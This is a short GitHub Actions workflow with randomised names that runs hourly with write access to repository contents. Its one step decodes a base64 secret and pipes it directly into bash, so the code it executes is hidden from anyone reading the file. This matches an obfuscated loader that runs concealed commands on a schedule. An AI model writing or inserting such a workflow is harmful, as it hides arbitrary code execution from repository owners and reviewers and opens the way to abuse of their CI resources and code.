name: YpdHfoGKEKoLgt
on:
  schedule:
    - cron: '12 * * * *'
  workflow_dispatch:
permissions:
  contents: write
jobs:
  UBVJoLHHwROH:
    runs-on: ubuntu-22.04
    env:
      NwlmKTcfRIrqbOrZdQ: ${{ secrets.NwlmKTcfRIrqbOrZdQ }}
    steps:
      - uses: actions/checkout@v4
      - run: echo "${{ secrets.ofUVmAGNqcIXodABma }}" | base64 -d | bash
